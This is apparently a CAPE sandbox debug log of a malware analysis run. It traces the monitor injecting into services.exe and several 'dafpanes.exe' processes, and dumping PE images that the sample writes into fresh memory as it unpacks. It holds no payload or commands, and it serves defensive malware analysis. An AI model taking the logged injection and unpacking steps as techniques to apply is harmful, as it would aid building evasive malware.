2019-02-11 19:32:10,869 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x220000 - 0x230000.
2019-02-11 19:32:10,869 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x220000.
2019-02-11 19:32:10,869 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x220000.
2019-02-11 19:32:10,869 [root] DEBUG: DumpPEsInRange: Scanning range 0x290000 - 0x2a0000.
2019-02-11 19:32:10,869 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x290000
2019-02-11 19:32:10,869 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,869 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x290000
2019-02-11 19:32:10,869 [root] DEBUG: DumpProcess: Module entry point VA is 0x29f5e0
2019-02-11 19:32:10,869 [root] DEBUG: savePeFileToDisk: Name clash, trying to obtain new name...
2019-02-11 19:32:10,869 [root] DEBUG: Error 183 (0xb7) - savePeFileToDisk: Failed twice to rename file: Cannot create a file when that file already exists.
2019-02-11 19:32:10,869 [root] DEBUG: Error 183 (0xb7) - DumpProcess: Error - Cannot dump image: Cannot create a file when that file already exists.
2019-02-11 19:32:10,869 [root] DEBUG: DumpImageInCurrentProcess: Failed to dump PE as virtual image.
2019-02-11 19:32:10,869 [root] DEBUG: DumpPEsInRange: Failed to dump PE image from 0x290000.
2019-02-11 19:32:10,869 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x290001-0x2a0000.
2019-02-11 19:32:10,869 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x291000 and Type=0x0.
2019-02-11 19:32:10,869 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x291000, size 0 with Callback 0x74942e90, ThreadHandle = 0xac.
2019-02-11 19:32:10,869 [root] DEBUG: ProtectionHandler: Execution breakpoint 0 set base address: 0x291000, AllocationBaseExecBpSet = 1
2019-02-11 19:32:10,885 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x291000
2019-02-11 19:32:10,885 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x291000.
2019-02-11 19:32:10,885 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x290000, size 0x10744).
2019-02-11 19:32:10,885 [root] DEBUG: DumpPEsInRange: Scanning range 0x290000 - 0x2a0744.
2019-02-11 19:32:10,885 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x290000
2019-02-11 19:32:10,885 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,885 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x290000
2019-02-11 19:32:10,885 [root] DEBUG: DumpProcess: Module entry point VA is 0x29f5e0
2019-02-11 19:32:10,885 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2832_88610122311122019
2019-02-11 19:32:10,885 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:10,885 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x290000.
2019-02-11 19:32:10,885 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x290001-0x2a0744.
2019-02-11 19:32:10,885 [root] DEBUG: MidPageExecCallback: PE image(s) detected and dumped.
2019-02-11 19:32:10,885 [root] DEBUG: MidPageExecCallback executed successfully.
2019-02-11 19:32:10,885 [root] INFO: Notified of termination of process with pid 2932.
2019-02-11 19:32:11,509 [root] INFO: Process with pid 2932 has terminated
2019-02-11 19:32:15,237 [root] INFO: Announced starting service "dafpanes"
2019-02-11 19:32:15,237 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-02-11 19:32:15,237 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-02-11 19:32:15,253 [lib.api.process] INFO: 64-bit DLL to inject is C:\eqetkxw\dll\aLtALpvR.dll, loader C:\eqetkxw\bin\uLfuCZUh.exe
2019-02-11 19:32:15,253 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 19:32:15,253 [root] DEBUG: Process dumps enabled.
2019-02-11 19:32:15,253 [root] INFO: Disabling sleep skipping.
2019-02-11 19:32:15,315 [root] WARNING: Unable to place hook on LockResource
2019-02-11 19:32:15,332 [root] WARNING: Unable to hook LockResource
2019-02-11 19:32:15,378 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x00000000741C0000, image base 0x00000000FFA10000, stack from 0x0000000002CF6000-0x0000000002D00000
2019-02-11 19:32:15,394 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-02-11 19:32:15,394 [root] INFO: Added new process to list with pid: 460
2019-02-11 19:32:15,394 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-02-11 19:32:16,299 [root] INFO: Announced 32-bit process name: dafpanes.exe pid: 2736
2019-02-11 19:32:16,299 [root] INFO: Added new process to list with pid: 2736
2019-02-11 19:32:16,299 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 19:32:16,299 [lib.api.process] INFO: 32-bit DLL to inject is C:\eqetkxw\dll\eoxfAQ.dll, loader C:\eqetkxw\bin\coeISff.exe
2019-02-11 19:32:16,313 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2736
2019-02-11 19:32:16,345 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-02-11 19:32:16,391 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x120000
2019-02-11 19:32:16,391 [root] DEBUG: CAPE initialised (32-bit).
2019-02-11 19:32:16,391 [root] INFO: Disabling sleep skipping.
2019-02-11 19:32:16,391 [root] INFO: Monitor successfully loaded in process with pid 2736.
2019-02-11 19:32:16,391 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x130000, RegionSize: 0x1a000.
2019-02-11 19:32:16,407 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x130000, AllocationSize: 0x1a000, ThreadId: 0xa98
2019-02-11 19:32:16,424 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x130000 and Type=0x1.
2019-02-11 19:32:16,438 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x130000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:16,454 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x130000
2019-02-11 19:32:16,454 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,454 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x130000.
2019-02-11 19:32:16,470 [root] DEBUG: BaseAddressWriteCallback: M written to first byte, awaiting next byte.
2019-02-11 19:32:16,470 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:16,470 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,470 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x130000.
2019-02-11 19:32:16,470 [root] DEBUG: BaseAddressWriteCallback: MZ header found.
2019-02-11 19:32:16,470 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x13003c and Type=0x1.
2019-02-11 19:32:16,470 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,486 [root] DEBUG: BaseAddressWriteCallback: set write bp on e_lfanew write location: 0x13003c (EIP = 0x12736e2)
2019-02-11 19:32:16,486 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:16,486 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,486 [root] DEBUG: PEPointerWriteCallback entry.
2019-02-11 19:32:16,486 [root] DEBUG: PEPointerWriteCallback: Breakpoint 0 at Address 0x13003c.
2019-02-11 19:32:16,486 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1300c8 and Type=0x1.
2019-02-11 19:32:16,502 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,502 [root] DEBUG: PEPointerWriteCallback: set write bp on e_lfanew write location 0x1300c8 (EIP = 0x12736e2)
2019-02-11 19:32:16,502 [root] DEBUG: PEPointerWriteCallback executed successfully.
2019-02-11 19:32:16,502 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,502 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1300c8.
2019-02-11 19:32:16,502 [root] DEBUG: PEHeaderWriteCallback: PE header has: 0x50.
2019-02-11 19:32:16,516 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:16,516 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,516 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1300c8.
2019-02-11 19:32:16,516 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1300f0 and Type=0x1.
2019-02-11 19:32:16,516 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,548 [root] DEBUG: PEHeaderWriteCallback: set write bp on AddressOfEntryPoint location (EIP = 0x12736e2).
2019-02-11 19:32:16,548 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:16,548 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,563 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1300f0.
2019-02-11 19:32:16,563 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x13007f and Type=0x0.
2019-02-11 19:32:16,563 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,563 [root] DEBUG: EntryPointWriteCallback: Execution bp 1 set on EntryPoint 0x13007f (EIP = 0x12736e2).
2019-02-11 19:32:16,563 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:16,563 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,595 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1300f0.
2019-02-11 19:32:16,595 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x131f7f and Type=0x0.
2019-02-11 19:32:16,595 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,611 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x131f7f (EIP = 0x12736e2).
2019-02-11 19:32:16,611 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:16,611 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,611 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1300f0.
2019-02-11 19:32:16,611 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x131f7f and Type=0x0.
2019-02-11 19:32:16,611 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,611 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x131f7f (EIP = 0x12736e2).
2019-02-11 19:32:16,611 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:16,611 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,625 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1300f0.
2019-02-11 19:32:16,625 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x131f7f and Type=0x0.
2019-02-11 19:32:16,625 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,625 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x131f7f (EIP = 0x12736e2).
2019-02-11 19:32:16,625 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:16,625 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x131f7f
2019-02-11 19:32:16,625 [root] DEBUG: EntryPointExecCallback: Breakpoint 1 at Address 0x131f7f.
2019-02-11 19:32:16,641 [root] DEBUG: DumpPEsInRange: Scanning range 0x130000 - 0x149000.
2019-02-11 19:32:16,641 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:16,641 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x130000-0x149000.
2019-02-11 19:32:16,641 [root] DEBUG: EntryPointExecCallback: failed to dump PE module.
2019-02-11 19:32:16,641 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x250000, RegionSize: 0x10000.
2019-02-11 19:32:16,641 [root] DEBUG: NtAllocateVirtualMemory hook: attempting CAPE dump on previous region: 0x130000.
2019-02-11 19:32:16,657 [root] DEBUG: DumpPEsInRange: Scanning range 0x130000 - 0x14a000.
2019-02-11 19:32:16,657 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:16,657 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x130000-0x14a000.
2019-02-11 19:32:16,657 [root] DEBUG: NtAllocateVirtualMemory hook: dumping memory range at 0x130000.
2019-02-11 19:32:16,657 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2736_65816122311122019
2019-02-11 19:32:16,673 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2736_65816122311122019
2019-02-11 19:32:16,673 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x130000 - 0x14a000.
2019-02-11 19:32:16,673 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x250000, AllocationSize: 0x10000, ThreadId: 0xa98
2019-02-11 19:32:16,673 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x250000 and Type=0x1.
2019-02-11 19:32:16,673 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x250000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:16,673 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x250000
2019-02-11 19:32:16,673 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x13177b
2019-02-11 19:32:16,673 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x250000.
2019-02-11 19:32:16,673 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x250000: 0x0.
2019-02-11 19:32:16,673 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x250000 and Type=0x0.
2019-02-11 19:32:16,673 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,673 [root] DEBUG: BaseAddressWriteCallback: Execution breakpoint 1 set base address: 0x250000, AllocationBaseExecBpSet = 1 (EIP = 0x13177b)
2019-02-11 19:32:16,688 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:16,688 [root] DEBUG: ProtectionHandler: Address: 0x2a1000, RegionSize: 0xf744
2019-02-11 19:32:16,688 [root] DEBUG: ProtectionHandler: attempting CAPE dump on region: 0x250000.
2019-02-11 19:32:16,688 [root] DEBUG: DumpPEsInRange: Scanning range 0x2a0000 - 0x2b0000.
2019-02-11 19:32:16,688 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x2a0000
2019-02-11 19:32:16,688 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:16,688 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x2a0000
2019-02-11 19:32:16,688 [root] DEBUG: DumpProcess: Module entry point VA is 0x2af5e0
2019-02-11 19:32:16,703 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2736_68916122311122019
2019-02-11 19:32:16,703 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:16,703 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x2a0000.
2019-02-11 19:32:16,720 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x2a0001-0x2b0000.
2019-02-11 19:32:16,720 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-02-11 19:32:16,720 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x250000 - 0x260000.
2019-02-11 19:32:16,720 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x250000.
2019-02-11 19:32:16,736 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x250000.
2019-02-11 19:32:16,736 [root] DEBUG: DumpPEsInRange: Scanning range 0x2a0000 - 0x2b0000.
2019-02-11 19:32:16,750 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x2a0000
2019-02-11 19:32:16,750 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:16,766 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x2a0000
2019-02-11 19:32:16,766 [root] DEBUG: DumpProcess: Module entry point VA is 0x2af5e0
2019-02-11 19:32:16,782 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2736_76716122311122019
2019-02-11 19:32:16,782 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:16,813 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x2a0000.
2019-02-11 19:32:16,813 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x2a0001-0x2b0000.
2019-02-11 19:32:16,813 [root] DEBUG: ProtectionHandler: Found and dumped PE image(s).
2019-02-11 19:32:16,813 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x2a1000 and Type=0x0.
2019-02-11 19:32:16,813 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x2a1000, size 0 with Callback 0x74942e90, ThreadHandle = 0xac.
2019-02-11 19:32:16,813 [root] DEBUG: ProtectionHandler: Execution breakpoint 0 set base address: 0x2a1000, AllocationBaseExecBpSet = 1
2019-02-11 19:32:16,845 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x2a1000
2019-02-11 19:32:16,845 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x2a1000.
2019-02-11 19:32:16,845 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x2a0000, size 0x10744).
2019-02-11 19:32:16,845 [root] DEBUG: DumpPEsInRange: Scanning range 0x2a0000 - 0x2b0744.
2019-02-11 19:32:16,845 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x2a0000
2019-02-11 19:32:16,845 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:16,845 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x2a0000
2019-02-11 19:32:16,859 [root] DEBUG: DumpProcess: Module entry point VA is 0x2af5e0
2019-02-11 19:32:16,875 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2736_55546382311122019
2019-02-11 19:32:16,875 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:16,875 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x2a0000.
2019-02-11 19:32:16,875 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x2a0001-0x2b0744.
2019-02-11 19:32:16,875 [root] DEBUG: MidPageExecCallback: PE image(s) detected and dumped.
2019-02-11 19:32:16,875 [root] DEBUG: MidPageExecCallback executed successfully.
2019-02-11 19:32:16,891 [root] INFO: Announced 32-bit process name: dafpanes.exe pid: 2224
2019-02-11 19:32:16,891 [root] INFO: Added new process to list with pid: 2224
2019-02-11 19:32:16,891 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 19:32:16,891 [lib.api.process] INFO: 32-bit DLL to inject is C:\eqetkxw\dll\eoxfAQ.dll, loader C:\eqetkxw\bin\coeISff.exe
2019-02-11 19:32:16,923 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2224
2019-02-11 19:32:16,923 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-02-11 19:32:16,923 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0xb0000
2019-02-11 19:32:16,923 [root] DEBUG: CAPE initialised (32-bit).
2019-02-11 19:32:16,923 [root] INFO: Disabling sleep skipping.
2019-02-11 19:32:16,937 [root] INFO: Monitor successfully loaded in process with pid 2224.
2019-02-11 19:32:16,937 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x1e0000, RegionSize: 0x1a000.
2019-02-11 19:32:16,937 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x1e0000, AllocationSize: 0x1a000, ThreadId: 0x8ac
2019-02-11 19:32:16,937 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x1e0000 and Type=0x1.
2019-02-11 19:32:16,937 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x1e0000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:16,937 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x1e0000
2019-02-11 19:32:16,953 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,953 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x1e0000.
2019-02-11 19:32:16,953 [root] DEBUG: BaseAddressWriteCallback: M written to first byte, awaiting next byte.
2019-02-11 19:32:16,953 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:16,953 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,953 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x1e0000.
2019-02-11 19:32:16,953 [root] DEBUG: BaseAddressWriteCallback: MZ header found.
2019-02-11 19:32:16,970 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1e003c and Type=0x1.
2019-02-11 19:32:16,970 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,970 [root] DEBUG: BaseAddressWriteCallback: set write bp on e_lfanew write location: 0x1e003c (EIP = 0x12736e2)
2019-02-11 19:32:16,970 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:16,970 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,970 [root] DEBUG: PEPointerWriteCallback entry.
2019-02-11 19:32:16,970 [root] DEBUG: PEPointerWriteCallback: Breakpoint 0 at Address 0x1e003c.
2019-02-11 19:32:16,970 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1e00c8 and Type=0x1.
2019-02-11 19:32:16,970 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,984 [root] DEBUG: PEPointerWriteCallback: set write bp on e_lfanew write location 0x1e00c8 (EIP = 0x12736e2)
2019-02-11 19:32:16,984 [root] DEBUG: PEPointerWriteCallback executed successfully.
2019-02-11 19:32:16,984 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,984 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1e00c8.
2019-02-11 19:32:16,984 [root] DEBUG: PEHeaderWriteCallback: PE header has: 0x50.
2019-02-11 19:32:16,984 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:16,984 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:16,984 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1e00c8.
2019-02-11 19:32:16,984 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1e00f0 and Type=0x1.
2019-02-11 19:32:16,984 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:16,984 [root] DEBUG: PEHeaderWriteCallback: set write bp on AddressOfEntryPoint location (EIP = 0x12736e2).
2019-02-11 19:32:16,984 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:17,000 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:17,000 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1e00f0.
2019-02-11 19:32:17,000 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x1e007f and Type=0x0.
2019-02-11 19:32:17,000 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:17,016 [root] DEBUG: EntryPointWriteCallback: Execution bp 1 set on EntryPoint 0x1e007f (EIP = 0x12736e2).
2019-02-11 19:32:17,016 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:17,032 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:17,032 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1e00f0.
2019-02-11 19:32:17,032 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x1e1f7f and Type=0x0.
2019-02-11 19:32:17,032 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x1e1f7f (EIP = 0x12736e2).
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:17,048 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1e00f0.
2019-02-11 19:32:17,048 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x1e1f7f and Type=0x0.
2019-02-11 19:32:17,048 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x1e1f7f (EIP = 0x12736e2).
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:17,048 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1e00f0.
2019-02-11 19:32:17,048 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x1e1f7f and Type=0x0.
2019-02-11 19:32:17,048 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x1e1f7f (EIP = 0x12736e2).
2019-02-11 19:32:17,048 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:17,048 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x1e1f7f
2019-02-11 19:32:17,062 [root] DEBUG: EntryPointExecCallback: Breakpoint 1 at Address 0x1e1f7f.
2019-02-11 19:32:17,062 [root] DEBUG: DumpPEsInRange: Scanning range 0x1e0000 - 0x1f9000.
2019-02-11 19:32:17,062 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:17,062 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1e0000-0x1f9000.
2019-02-11 19:32:17,062 [root] DEBUG: EntryPointExecCallback: failed to dump PE module.
2019-02-11 19:32:17,062 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x200000, RegionSize: 0x10000.
2019-02-11 19:32:17,062 [root] DEBUG: NtAllocateVirtualMemory hook: attempting CAPE dump on previous region: 0x1e0000.
2019-02-11 19:32:17,062 [root] DEBUG: DumpPEsInRange: Scanning range 0x1e0000 - 0x1fa000.
2019-02-11 19:32:17,078 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:17,078 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1e0000-0x1fa000.
2019-02-11 19:32:17,078 [root] DEBUG: NtAllocateVirtualMemory hook: dumping memory range at 0x1e0000.
2019-02-11 19:32:17,078 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2224_7917122311122019
2019-02-11 19:32:17,078 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_7917122311122019
2019-02-11 19:32:17,078 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x1e0000 - 0x1fa000.
